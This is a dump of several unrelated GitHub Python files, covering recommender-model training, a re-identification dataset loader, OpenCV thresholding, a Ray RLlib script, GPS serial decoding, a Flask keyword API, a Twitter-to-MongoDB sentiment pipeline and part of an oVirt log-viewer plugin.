ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccdin_tr_res = ccdin_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccdin_tr.model.save('dintr_model.h5')\n\nccpnn = ccPNN(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccpnn_res = ccpnn.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccpnn.model.save('pnn_model.h5')\n\nccpnn_tr = ccPNN(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len, weighted=True, use_Transformer=True, w=1e-12)\nccpnn_tr_res = ccpnn_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccpnn_tr.model.save('pnntr_model.h5')\n\nccdeepfm = ccdeepFM(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccdeepfm_res = ccdeepfm.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccdeepfm.model.save('deepfm_model.h5')\n\nccdeepfm_tr = ccdeepFM(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccdeepfm_tr_res = ccdeepfm_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccdeepfm_tr.model.save('deepfmtr_model.h5')\n\nstart, end, model = 1, 6, 'base'\nfor i in range(start, end):\n print('#'*50)\n print(i)\n print('#'*50)\n\n K.clear_session()\n ccbase = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\n ccbase_res = ccbase.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\n# np.savetxt(model + '_auc_' + str(i) + '.txt', ccbase_res.auc_val)\n \n K.clear_session()\n ccbase_tr = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\n ccbase_tr_res = ccbase_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\n# np.savetxt(model + 'tr_auc_' + str(i) + '.txt', ccbase_tr_res.auc_val)\n\n\ndraw(temp, train_num, batch_size, record_num, 'ReLU', 1, ['deepfm', 'base', 'base_tr', 'din', 'din_tr', 'pnn']) \n\n\ntemp1_mean, temp2_mean = 0, 0\nfor i in range(start, end):\n temp1 = np.loadtxt(model + '_auc_' + str(i) + '.txt')\n temp2 = np.loadtxt(model + 'tr_auc_' + str(i) + '.txt')\n temp1_mean = temp1_mean + temp1\n temp2_mean = temp2_mean + temp2\n\ntemp1_mean = temp1_mean / (end - start)\ntemp2_mean = temp2_mean / (end - start)\n\nx_index = (np.arange(len(temp1_mean))+1) / (train_num // batch_size // record_num)\nplt.plot(x_index, temp1_mean, label=model)\nplt.plot(x_index, temp2_mean, label=model+'_tr')\nplt.xlabel('epochs')\nplt.ylabel('auc')\nplt.legend()\nplt.title('The training process')\n\n\n\n\n\n","repo_name":"AcerLai/MyRS","sub_path":"lhj-master/深度推荐模型:din模型/code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":29076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8782963574","text":"# encoding: utf-8\r\n\"\"\"\r\n@author: sherlock\r\n@contact: sherlockliao01@gmail.com\r\n\"\"\"\r\n\r\nimport glob\r\nimport re\r\nimport pdb\r\nimport os\r\nimport os.path as osp\r\nimport numpy as np\r\nfrom .bases import BaseImageDataset\r\n\r\n\r\nclass VERI_MM(BaseImageDataset):\r\n \"\"\"\r\n Market1501\r\n Reference:\r\n Zheng et al. Scalable Person Re-identification: A Benchmark. ICCV 2015.\r\n URL: http://www.liangzheng.org/Project/project_reid.html\r\n\r\n Dataset statistics:\r\n # identities: 1501 (+1 for background)\r\n # images: 12936 (train) + 3368 (query) + 15913 (gallery)\r\n \"\"\"\r\n dataset_dir = 'image_gan'\r\n\r\n def __init__(self, root='/home/haoluo/data', verbose=True, **kwargs):\r\n super(VERI_MM, self).__init__()\r\n root = r\"F:\\datasets\\VeRi776_multimodal\"\r\n self.dataset_dir = osp.join(root, self.dataset_dir)\r\n self.train_dir = osp.join(self.dataset_dir, 'image_train')\r\n self.query_dir = osp.join(self.dataset_dir, 'image_query')\r\n self.gallery_dir = osp.join(self.dataset_dir, 'image_test')\r\n\r\n self._check_before_run()\r\n\r\n train = self._process_dir(self.train_dir, relabel=True)\r\n query = self._process_dir(self.query_dir, relabel=False)\r\n gallery = self._process_dir(self.gallery_dir, relabel=False)\r\n #pdb.set_trace()\r\n if verbose:\r\n print(\"=> RGB_IR loaded\")\r\n self.print_dataset_statistics(train, query, gallery)\r\n\r\n self.train = train\r\n self.query = query\r\n self.gallery = gallery\r\n\r\n self.num_train_pids, self.num_train_imgs, self.num_train_cams = self.get_imagedata_info(self.train)\r\n self.num_query_pids, self.num_query_imgs, self.num_query_cams = self.get_imagedata_info(self.query)\r\n self.num_gallery_pids, self.num_gallery_imgs, self.num_gallery_cams = self.get_imagedata_info(self.gallery)\r\n\r\n print(\"veri776 multimodal version used as dataset! => {}\".format(self.dataset_dir))\r\n #pdb.set_trace()\r\n\r\n def _check_before_run(self):\r\n \"\"\"Check if all files are available before going deeper\"\"\"\r\n if not osp.exists(self.dataset_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.dataset_dir))\r\n if not osp.exists(self.train_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.train_dir))\r\n if not osp.exists(self.query_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.query_dir))\r\n if not osp.exists(self.gallery_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.gallery_dir))\r\n\r\n def _process_dir(self, dir_path, relabel=False):\r\n imgs = glob.glob(osp.join(dir_path, '*.jpg'))\r\n pattern = re.compile(r'([-\\d]+)_c([-\\d]+)')\r\n\r\n pid_container = set()\r\n for img in imgs:\r\n pid, _ = map(int, pattern.search(img).groups())\r\n if pid == -1: continue # junk images are just ignored\r\n pid_container.add(pid)\r\n pid2label = {pid: label for label, pid in enumerate(pid_container)}\r\n\r\n dataset = []\r\n for img in imgs:\r\n pid, camid = map(int, pattern.search(img).groups())\r\n #pdb.set_trace()\r\n #if pid == -1: continue # junk images are just ignored\r\n assert 1 <= pid <= 776 # pid == 0 means background\r\n assert 1 <= camid <= 20\r\n camid -= 1 # index starts from 0\r\n if relabel: pid = pid2label[pid]\r\n\r\n r_path = osp.join(dir_path, img)\r\n n_path = osp.join(dir_path+\"_n\", img)\r\n t_path = osp.join(dir_path+\"_t\", img)\r\n\r\n dataset.append(((r_path, n_path, t_path), pid, 0, camid))\r\n return dataset\r\n\r\n","repo_name":"superlollipop123/Cross-directional-Center-Network-and-MSVR310","sub_path":"data/datasets/veri_mm.py","file_name":"veri_mm.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"27028892129","text":"from tkinter import *\n\nroot = Tk()\n\ncanvas = Canvas(root, width='300', height='300')\ncanvas.pack()\n\n# create a square drawing function that takes 2 parameters:\n# the square size, and the fill color,\n# and draws a square of that size and color to the center of the canvas.\n# create a loop that fills the canvas with rainbow colored squares.\n\nsquare_1 = 20\nsquare_1_color = 'green'\n\nsquare_2 = 50\nsquare_2_color = 'purple'\n\nsquare_3 = 100\nsquare_3_color = 'blue'\n\ndef center_square(x,y):\n square = canvas.create_rectangle (150 - (x/2), 150 - (x/2), 150 + (x/2), 150 + (x/2), fill=y)\n\ncenter_square(square_3, square_3_color)\ncenter_square(square_2, square_2_color)\ncenter_square(square_1, square_1_color)\n\nroot.mainloop()\n","repo_name":"green-fox-academy/AHolcsik","sub_path":"Week03/Day3/rainbow_box_function.py","file_name":"rainbow_box_function.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15132377800","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 5 22:09:48 2017\n\n@author: zhangzhexi\n\"\"\"\n\nimport cv2\n\ndef main():\n image = cv2.imread(\"Test_images/Lenna.png\",1)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Input Image',gray)\n cv2.imwrite('Input_image.jpg',gray)\n \n threshold_value = 128\n dst,thresh = cv2.threshold(gray, threshold_value, 255, cv2.THRESH_TRUNC)\n cv2.imshow(\"Threshold Image\", thresh)\n cv2.imwrite(\"Threshold_image.jpg\",thresh)\n\n# Binary Threshold\n dst,thresh_binary = cv2.threshold(gray, threshold_value, 255, cv2.THRESH_BINARY)\n cv2.imshow(\"Binary threshold\", thresh_binary)\n cv2.imwrite(\"Threshold_binary.jpg\", thresh_binary)\n\n# Band Thresholding\n threshold1 = 27\n threshold2 = 125\n dst,binary_image_1 = cv2.threshold(gray, threshold1, 255, cv2.THRESH_BINARY)\n dst,binary_image_2 = cv2.threshold(gray, threshold2, 255, cv2.THRESH_BINARY_INV)\n band_thresholded_image = cv2.bitwise_and(binary_image_1,binary_image_2)\n cv2.imshow(\"Band Thresholding\", band_thresholded_image)\n cv2.imwrite(\"Band_Thresholding.jpg\", band_thresholded_image)\n\n# Semi Thresholding\n current_threshold = 128\n max_threshold = 255;\n dst,semi_thresholded_image = cv2.threshold(gray,current_threshold,max_threshold,cv2.THRESH_BINARY_INV|cv2.THRESH_OTSU)\n semi_thresholded_image = cv2.bitwise_and(gray,semi_thresholded_image)\n cv2.imshow(\"Semi Thresholding\",semi_thresholded_image)\n cv2.imwrite(\"Semi_Thresholding.jpg\",semi_thresholded_image)\n\n# Adaptive Thresholding\n adaptive_thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,101,10)\n cv2.imshow(\"Adaptive Thresholding\", adaptive_thresh)\n cv2.imwrite(\"Adaptive_Thresholding.jpg\", adaptive_thresh)\n \n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main()\n","repo_name":"zzx0921/EC601_OpenCV","sub_path":"Exercise4/Threshold.py","file_name":"Threshold.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34741969477","text":"import pyvirtualdisplay\r\n_display = pyvirtualdisplay.Display(visible=False, size=(1400, 900))\r\n_ = _display.start()\r\nimport gym\r\nfrom gym.utils.play import play\r\nenv = gym.make(\"CartPole-v0\")\r\nplay(env, zoom=4)\r\nimport ray\r\nfrom ray import tune\r\nfrom ray.rllib.agents.dqn import DQNTrainer\r\n\r\nray.shutdown()\r\nray.init(\r\n include_webui=False,\r\n ignore_reinit_error=True,\r\n object_store_memory=8 * 1024 * 1024 * 1024 # 8GB limit … feel free to increase this if you can\r\n)\r\n\r\nENV = 'Humanoid-v1'\r\nTARGET_REWARD = 195\r\nTRAINER = DQNTrainer\r\n\r\ntune.run(\r\n TRAINER,\r\n stop={\"episode_reward_mean\": TARGET_REWARD}, # stop as soon as we \"solve\" the environment\r\n config={\r\n \"env\": ENV,\r\n \"num_workers\": 0, # run in a single process\r\n \"num_gpus\": 0,\r\n \"monitor\": True, # store stats and videos periodically\r\n \"evaluation_num_episodes\": 25, # every 25 episodes instead of the default 10\r\n }\r\n)\r\nfrom base64 import b64encode\r\nfrom pathlib import Path\r\nfrom typing import List\r\n\r\n# this will depend on which provider you are using; the correct version is\r\n# probably what you get if you append /ray/results/ to the output from !pwd\r\nOUT_PATH = Path('/root/ray_results/')\r\n\r\ndef latest_experiment() -> Path:\r\n \"\"\" Get the path of the results directory of the most recent training run. \"\"\"\r\n experiment_dirs = []\r\n for algorithm in OUT_PATH.iterdir():\r\n if not algorithm.is_dir():\r\n continue\r\n for experiment in algorithm.iterdir():\r\n if not experiment.is_dir():\r\n continue\r\n experiment_dirs.append((experiment.stat().st_mtime, experiment))\r\n return max(experiment_dirs)[1]\r\n\r\ndef latest_videos() -> List[Path]:\r\n # because the ISO timestamp is in the name, the last alphabetically is the latest\r\n return list(sorted(latest_experiment().glob('*.mp4')))\r\n\r\ndef render_mp4(videopath: Path) -> str:\r\n mp4 = open(videopath, 'rb').read()\r\n base64_encoded_mp4 = b64encode(mp4).decode()\r\n return f'{videopath.name}
'\r\n\r\n\r\nfrom IPython.display import HTML\r\nhtml = render_mp4(latest_videos()[-1])\r\nHTML(html)","repo_name":"shivamkainth/rescience","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"26768411180","text":"'''Association example\n--Create a class Hardware with tow attributes 'name','installed_date'\nand add a method show_hardware which will show name and date\n\n--Create a class software with three attribute 'software_name','version','installed_date'\nand a method SHOW_Software which will show name,version and date\n\n--Create a class Computer with few attributes like 'name,'manufacture','location 'etc\nand two attributes one for hardware and one for software\n(list Type) and 5 function, for setting hardware,software,showing list of hardware,list of software and\nDisplay full specifications of the computer\n'''\n\n\nclass Hardware:\n\n def __init__(self):\n\n self.name = ''\n self.installed_date = ''\n self.list_of_hardware = []\n\n def show_hardware(self,name,installed_date):\n\n self.list_of_hardware.append(name)\n self.list_of_hardware.append(installed_date)\n\n\nclass Software:\n\n def __init__(self):\n\n self.software_name = ''\n self.version = 0\n self.installed_date = ''\n self.list_of_software=[]\n\n def show_software(self,software_name,version,installed_date):\n\n self.list_of_software.append(software_name)\n self.list_of_software.append(version)\n self.list_of_software.append(installed_date)\n\n\nclass Computer:\n\n def __init__(self,name,manufacturer,location):\n\n self.name = name\n self.manufacturer = manufacturer\n self.location = location\n self.clasHadw = Hardware()\n self.clasSoft = Software()\n\n def setting_hardware(self):\n\n print('Setting Hardware',self.clasHadw.list_of_hardware)\n print()\n\n def setting_software(self):\n\n print('Setting Software',self.clasSoft.list_of_software)\n print()\n\n def list_of_hardware(self):\n\n print('List Of Hardware: ')\n\n for hadw_list in self.clasHadw.list_of_hardware:\n print(hadw_list)\n print()\n\n def list_of_software(self):\n\n print('List of Software: ')\n\n for soft_list in self.clasSoft.list_of_software:\n print(soft_list)\n print()\n\n def show_full_specification(self):\n\n print(self.name,self.manufacturer,self.location,'contains:')\n print(self.clasHadw.list_of_hardware)\n print(self.clasSoft.list_of_software)\n\n\n\ncomp = Computer('Usman-PC','DEll','Karachi')\n\ncomp.clasHadw.show_hardware('Lan Card','Feb 5')\ncomp.clasHadw.show_hardware('Graphic Card','Jan 18')\ncomp.clasHadw.show_hardware('DVD Rom','March 18')\n\ncomp.setting_hardware()\ncomp.list_of_hardware()\n\ncomp.clasSoft.show_software('Pycharm',2.4,'Dec 2')\ncomp.clasSoft.show_software('MS office',2016,'Aril 19')\n\ncomp.setting_software()\ncomp.list_of_software()\n\ncomp.show_full_specification()","repo_name":"Mohammed-Usman/PythonCrashCourseTasks","sub_path":"association.py","file_name":"association.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27211917034","text":"#Written by Karan Jagdale, Undergraduate, IIT Bombay. \nimport serial\nimport io\nser=serial.Serial('/dev/ttyACM0',19200)\n\n\ndef bintodec(k,l):\n\tdecimal = 0\n\tbinary = []\n\tfor i in range(4):\n\t\tnzeros = 10 - len((k[l-i]))\n\t\tprint(nzeros)\n\t\tfor j in range(nzeros):\n\t\t\tbinary.append(0)\n\t\tfor j in range(len(k[l-i])-2):\n\t\t\t\tbinary.append(int((k[l-i][j+2]))) #Not appending initial 0b\n\tprint(binary)\n\tif(binary[0]==1):\n\t\tfor i in range(len(binary)):\n\t\t\tif(binary[i] == 1):\n\t\t\t\tbinary[i] = 0\n\t\t\telse:\n\t\t\t\tbinary[i] = 1\n\t\t\tdecimal = decimal + int(binary[i])*pow(2,(len(binary)-(i+1)))\n\t\treturn -(decimal+1)\n\t\n\telse:\n\t\tfor i in range(len(binary)):\n\t\t\tdecimal = decimal + int(binary[i])*pow(2,(len(binary)-(i+1)))\n\t\t\n\t\treturn decimal\n\t\t\n\n \ndef main():\n\ts = ser.read(26)\n\t#for i in s:\n\ts1 = map(bin,bytearray(s))\n\tN = bintodec(s1,17)\n\tE = bintodec(s1,21)\n\tD = bintodec(s1,25)\n\tprint(s1)\n\tprint(N,E,D)\nmain()\n\n\n\n\n\n\n\n#print(' '.join(format(ord(x), 'b') for x in s))\n#ser = io.BytesIO(b\"some initial binary data: \\x00\\x01\")\n#print(ser[0])\n#print(ord(s))\n#print(toBinary(s))\t#print((s1))\n\t#print(type(s1[0]))\n\t#print((s1[0][1]),int((s1[0][2])),(s1[0][3]))\nser.close()\n","repo_name":"KaranJagdale/Inertial-Snensors-Implementation","sub_path":"GPSDataLogging.py","file_name":"GPSDataLogging.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"1032769706","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, jsonify,abort\nimport sys\nimport time\nimport json\nimport thread\n\nreload(sys)\nsys.setdefaultencoding( \"utf-8\" )\n\napp = Flask(__name__)\n\n@app.route('/api/v1.0/keyword/',methods=['GET'])\ndef keyword(task_id):\n f = open('hehe.txt')\n keywords = task_id.split(' ')\n result = []\n for line in f:\n re = {}\n content = line.split(\"\\t\")\n if len(content) == 2:\n re['title'] = content[1]\n re['labels'] = [\"0\"]\n re['time'] = \"0\"\n re['href'] = \"0\"\n result.append(re)\n for word in keywords:\n if word in line:\n re['title'] = content[0]\n re['labels'] = content[1].split(\",\")\n re['time'] = content[2]\n re['href'] = content[3]\n result.append(re)\n break\n\n # print type(str(result).replace('u\\'','\\'').decode(\"unicode-escape\"))\n return json.dumps(result)\n\n@app.route('/api/v1.0/upload/',methods=['GET'])\ndef upload(task_id):\n f = open(\"hehe.txt\",\"a\")\n keyword = task_id.split(\" \")\n f.write(str(keyword[0]) + \"\\t\" + str(keyword[1])+\"\\n\")\n return \"1\"\n\nif __name__ == '__main__':\n app.run('0.0.0.0',debug=True)\n\n","repo_name":"AndyShan/MyHeadline","sub_path":"server/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"16577787516","text":"# Twitter ELT Pipeline\r\n# -----------------------------------------------------------------------\r\n# Imports\r\nfrom pymongo import MongoClient\r\nfrom airflow import DAG\r\nimport tweepy\r\nfrom textblob import TextBlob\r\nimport pandas as pd\r\nfrom airflow.operators.python import PythonOperator\r\nfrom datetime import timedelta\r\nfrom datetime import datetime\r\n# -----------------------------------------------------------------------\r\n# Airflow SetUP\r\n\r\n# Set default_args dictionary\r\ndefault_args = {\r\n # Owner of the DAG\r\n \"owner\": \"me\", \r\n # Start time \r\n \"start_date\": datetime.now(), \r\n \"depends_on_past\": False,\r\n # Retries are disabled\r\n \"retries\": 0,\r\n # If it retries, it waits a tenth of a minute to retry\r\n \"retry_delay\": timedelta(minutes=0.1), \r\n}\r\n\r\n# Creating a DAG called TWITTER_MONGO_DAG that is schedule to \r\n# repeat each minute\r\ndag = DAG(\r\n \"TWITTER_MONGO_DAG\",\r\n default_args=default_args,\r\n # Runs every minute\r\n schedule_interval=timedelta(minutes=1)\r\n)\r\n# -----------------------------------------------------------------------\r\n# Function to scrap tweets and store them in Mongo DB\r\ndef request_to_mongo():\r\n # Login Credentials for the Twitter API\r\n\r\n # Set up API credentials for Twitter API\r\n consumer_key = 'enter-consumer-key-here' \r\n consumer_secret = 'enter-consumer-secret-here'\r\n access_token = 'enter-access-token-here'\r\n access_token_secret = 'enter-access-token-secret-here'\r\n\r\n # Authenticate using the Twitter API\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n api = tweepy.API(auth)\r\n\r\n client = MongoClient(host='host.docker.internal', port=27017) # connecting client to an internal port within docker where airflow is being run\r\n\r\n # Create new Database in MongoDB called \"mydatabase\"\r\n db = client['mydatabase']\r\n\r\n # Create the collection in MongoDB for the tweets\r\n collection = db['tweets']\r\n\r\n # Get the tweets from the OpenAI Twitter account\r\n searcht = api.search_tweets(q=\"ChatGPT -filter:retweets\", lang='en', count = 100)\r\n\r\n current = []\r\n # Collect the current tweets in the Mongo DB\r\n for doc in collection.find():\r\n current.append(doc['_id'])\r\n # Search through the new and current tweets to ensure no duplicates are\r\n # into Mongo\r\n for tweet in searcht:\r\n if tweet.id in current:\r\n pass\r\n else:\r\n # Create a dictionary for each tweet\r\n tweet_info = {}\r\n # Tweet ID\r\n tweet_info[\"id\"] = tweet.id\r\n # Date the Tweet was tweeted\r\n tweet_info[\"created_at\"] = tweet.created_at\r\n # Text of the Tweet\r\n tweet_info[\"text\"] = tweet.text\r\n # ID of the user that Tweeted the tweet\r\n tweet_info[\"user_id\"] = tweet.user.id\r\n # Location of the user that tweeted\r\n tweet_info[\"location\"] = tweet.user.location\r\n # FOllwoer count of the user that tweeted\r\n tweet_info[\"followers_count\"] = tweet.user.followers_count\r\n # The number of tweets the user has tweeted\r\n tweet_info[\"statuses_count\"] = tweet.user.statuses_count\r\n # When the user created their account\r\n tweet_info[\"user_creation\"] = tweet.user.created_at\r\n # The hashtags included in the tweet\r\n tweet_info[\"hashtags\"] = [hashtag[\"text\"] for hashtag in tweet.entities.get(\"hashtags\")]\r\n # URLs in the tweet\r\n tweet_info[\"urls\"] = [url[\"expanded_url\"] for url in tweet.entities.get(\"urls\")]\r\n # Users mentioned in the tweet\r\n tweet_info[\"user_mentions\"] = [user_mention[\"screen_name\"] for user_mention in tweet.entities.get(\"user_mentions\")]\r\n # Whether the tweet contains media\r\n tweet_info[\"media\"] = [media.media_url for media in tweet.entities.get(\"media\")] if hasattr(tweet, \"media\") else None\r\n # Whether the tweet contains a poll\r\n tweet_info[\"polls\"] = [poll.options for poll in tweet.polls()] if hasattr(tweet, \"polls\") else None\r\n # The number of retweets the tweet has\r\n tweet_info[\"retweet_count\"] = tweet.retweet_count\r\n # The number of likes the tweet has\r\n tweet_info[\"favorite_count\"] = tweet.favorite_count\r\n \r\n # Inserting the data into the database in MongoDB\r\n collection.insert_one(tweet_info)\r\n# -----------------------------------------------------------------------\r\n# Function to conduct sentiment analysis on the Tweets\r\ndef sentimental():\r\n\r\n # Connecting client to an internal port within docker where airflow is being run\r\n client = MongoClient(host='host.docker.internal', port=27017) \r\n\r\n # Connecting to the MongoDB\r\n db = client['mydatabase']\r\n\r\n # Connecting to the \"tweets\" collection in MongoDB\r\n collection = db['tweets']\r\n\r\n # Gathering all the data from the database\r\n data = collection.find()\r\n\r\n # Create lists to store the tweet id, tweet text and date of tweet\r\n id_list = []\r\n text_list = []\r\n date_list = []\r\n \r\n # Appenind the id, text and date to lists\r\n for d in data:\r\n id_list.append(d['_id'])\r\n text_list.append(d['text'])\r\n date_list.append(d['created_at'])\r\n\r\n# ---------------------------------------------------------------\r\n# Sentiment Analysis\r\n # Create lists to store the sentiment scores, tweet text and date of tweet\r\n sentiment_data_list = []\r\n text_data_list = []\r\n date_data_list = []\r\n\r\n # Conduct sentiment analysis on the tweets and store each sentiment score (polarity,subjectivity)\r\n for i in range(len(text_list)):\r\n # Text blob handles the sentiment analysis of the tweets\r\n tweet_blob = TextBlob(text_list[i])\r\n # Extracting the polarity and subjectivity scores\r\n polarity, subjectivity = tweet_blob.sentiment\r\n\r\n # Classifying the sentiment (Postive, Negative, Neutral)\r\n if polarity > 0:\r\n sentiment = \"Positive\"\r\n elif polarity == 0:\r\n sentiment = \"Neutral\"\r\n else:\r\n sentiment = \"Negative\"\r\n\r\n # # Storing the sentiment scores, tweet text and tweet dates in a dictionary\r\n sentiment_data = {\"tweet_id\": id_list[i], \"polarity score\": polarity, \"sentiment\": sentiment, \"subjectivity score\": subjectivity}\r\n text_data = {\"tweet_id\": id_list[i], 'tweet_content': text_list[i]}\r\n date_data = {\"tweet_id\": id_list[i], 'tweet_date': date_list[i]}\r\n\r\n sentiment_data_list.append(sentiment_data)\r\n text_data_list.append(text_data)\r\n date_data_list.append(date_data)\r\n\r\n\r\n # Storing the sentiment scores, tweet text and tweet dates in a dataframe\r\n sentiment_df = pd.DataFrame(sentiment_data_list)\r\n text_df = pd.DataFrame(text_data_list)\r\n date_df = pd.DataFrame(date_data_list)\r\n\r\n # Choose folder path to store the dataframes\r\n folder_path = 'insert-folder-path-here'\r\n\r\n # Save the DataFrame as a CSV file in the specified folder\r\n sentiment_df.to_csv(folder_path + '/sentiment_scores.csv', index=False)\r\n text_df.to_csv(folder_path + '/tweets.csv', index=False)\r\n date_df.to_csv(folder_path + '/dates.csv', index=False)\r\n\r\n# ---------------------------------------------------------------\r\n# Airflow Tasks\r\n\r\n# task1: calls the Twitter API and stores the tweets into MongoDB\r\ntask1 = PythonOperator(\r\n task_id = 'twit_mongo',\r\n python_callable=request_to_mongo,\r\n provide_context = True,\r\n dag=dag\r\n)\r\n\r\n# task2: extracts the data from the MongoDB and conducts sentiment analysis on the tweets\r\ntask2 = PythonOperator(\r\n task_id = 'sentimental_analysis',\r\n python_callable=sentimental,\r\n provide_context = True,\r\n dag=dag\r\n)\r\n\r\ntask2.set_upstream(task1)\r\n# ---------------------------------------------------------------\r\n","repo_name":"georgelopez7/Twitter-Data-ELT","sub_path":"twitter-ELT-airflow.py","file_name":"twitter-ELT-airflow.py","file_ext":"py","file_size_in_byte":7964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"3213264872","text":"from ovirt.node import ui\nfrom ovirt.node.plugins import NodePlugin\nfrom ovirt.node.utils import process, system\n\n\"\"\"\nA plugin for a support page\n\"\"\"\n\n\nclass Plugin(NodePlugin):\n def __init__(self, application):\n # Register F8: Display this plugin when F( is pressed\n show_plugin = lambda: application.switch_to_plugin(self)\n application.ui.register_hotkey([\"f8\"], show_plugin)\n super(Plugin, self).__init__(application)\n\n def name(self):\n return _(\"Support\")\n\n def rank(self):\n return 999\n\n def has_ui(self):\n return False\n\n def ui_content(self):\n ws = [ui.Header(\"header[0]\", _(\"Support Info\")),\n ui.Label(\"support.info\", _(\"Select one of the logfiles below.\")),\n ui.Divider(\"divider[0]\"),\n ui.Table(\"support.logfile\", \"\", _(\"Available Logfiles\"),\n self.__debugfiles_to_offer()),\n ]\n\n page = ui.Page(\"page\", ws)\n page.buttons = []\n self.widgets.add(page)\n return page\n\n def model(self):\n return {}\n\n def validators(self):\n return {}\n\n def on_change(self, changes):\n pass\n\n def on_merge(self, changes):\n if changes.contains_any([\"support.logfile\"]):\n logfile = changes[\"support.logfile\"]\n cmds = {\"node\": \"cat /var/log/ovirt.log | less\",\n \"ui\": \"cat /var/log/ovirt-node.log | less\",\n \"messages\": \"cat /var/log/messages | less\",\n \"audit\": \"cat /var/log/audit/audit.log | less\",\n \"dmesg\": \"dmesg | less\",\n \"journal\": \"journalctl --all --catalog --full\"\n }\n\n cmd = cmds[logfile] if logfile in cmds else None\n\n if cmd:\n contents = process.check_output(cmd, shell=True,\n stderr=process.STDOUT)\n return ui.TextViewDialog(\"output.dialog\", _(\"Logfile\"),\n contents)\n\n def __debugfiles_to_offer(self):\n items = [(\"node\", \"/var/log/ovirt.log\"),\n (\"ui\", \"/var/log/ovirt-node.log\"),\n (\"dmesg\", \"dmesg\"),\n (\"audit\", \"/var/log/audit/audit.log\")]\n\n if system.has_systemd():\n 